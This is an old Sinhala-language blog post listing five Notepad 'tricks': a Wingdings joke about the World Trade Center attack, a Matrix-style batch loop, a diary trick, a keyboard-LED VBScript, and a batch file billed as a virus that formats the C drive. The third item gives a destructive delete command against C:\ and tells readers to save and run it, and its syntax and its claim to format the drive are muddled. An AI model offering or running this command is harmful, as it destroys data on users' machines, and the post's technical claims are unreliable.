}); }); /* ]]> */

Social Icons

Monday, March 18, 2013

Notepad එකෙන් වඩ කෑලි 5ක්.


                        
1. World Trade Center Attack Trick


    1. Notepad එක Open කරලා මේ cord එක Type කරන්න“Q33N” (quotes නෑතිව) in capital letters.
    2. දැන් font size to 72.
    3. Font එක Wingdings. වෙනස් කරන්න

2. Matrix Effect Trick

1.notepad එක Open කරලා එකට මේ Code එක past කරගන්න.

    @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start


    2. දැන් Matrix.bat කියලාsave කරන්න
    3. දැන් saved file  එක open කරන්න

3. Creating Virus That Format C Drive

    1. notepad එක Open කරලා මේ Code එක past කරගන්න.


    @Echo off
    Del C:\ *.* |y


    2. දැන් virus.bat කියලාsave කරන්න    
    3. දැන් saved file  එක open කරන්න C Drive.එක format වෙනව බලගෙන


4. Making Personal Diary Using Notepad

   1 notepad එක Open කරලා .LOG කියලා Type කරගන්න. (capital Letters  වලින්)දැන් enter කරන්න
   2.කමති නමකින්Save කරන්න
   3. දැන් saved file  එක open කරන්න
 
5. Dancing Keyboard Led

   1. notepad එක Open කරලා මේ Code එක past කරගන්න.

    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    wshshell.sendkeys "{NUMLOCK}"
    wshshell.sendkeys "{SCROLLLOCK}"
    loop

    2. දැන්dance.vbs කියලා save කරන්න    
    3. දැන් saved file  එක open කරලා බලන්න keyboard එකෙ led lights  ටික

Comment එකක් දාලම යන්න

Comment එකක් දාලම යන්න

Popular Posts

අපිත් එක්ක එකතු වෙන්න

 
back to top